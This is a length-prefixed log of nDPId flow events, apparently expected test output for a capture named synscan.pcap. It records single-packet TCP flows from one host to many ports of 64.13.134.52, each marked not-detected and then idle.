-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":580,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":20005,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":640,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059517,"flow_last_seen":1278275059517,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":20005,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":640,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059517,"flow_last_seen":1278275059517,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":20005,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":948,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":28201,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":948,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":28201,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1007,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":28201,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1007,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":28201,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1784,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1580,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1784,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1580,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1873,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1580,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1873,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1580,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1839,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061206,"flow_last_seen":1278275061206,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5678,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1839,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061206,"flow_last_seen":1278275061206,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5678,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1922,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5678,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1922,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5678,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":915,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5679,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":915,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5679,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1583,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1583,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":982,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5679,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":982,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5679,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1583,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1583,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1594,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1594,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1594,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1594,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":458,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7741,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":458,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7741,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":490,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7741,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":490,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7741,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":540,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":20031,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":540,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":20031,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":873,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1600,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":873,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1600,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":607,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":20031,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":607,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":20031,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":932,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1600,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":932,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1600,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":801,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059737,"flow_last_seen":1278275059737,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":17988,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":801,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059737,"flow_last_seen":1278275059737,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":17988,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":854,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":17988,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":854,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":17988,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":890,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3659,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":890,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3659,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":965,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3659,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":965,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3659,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 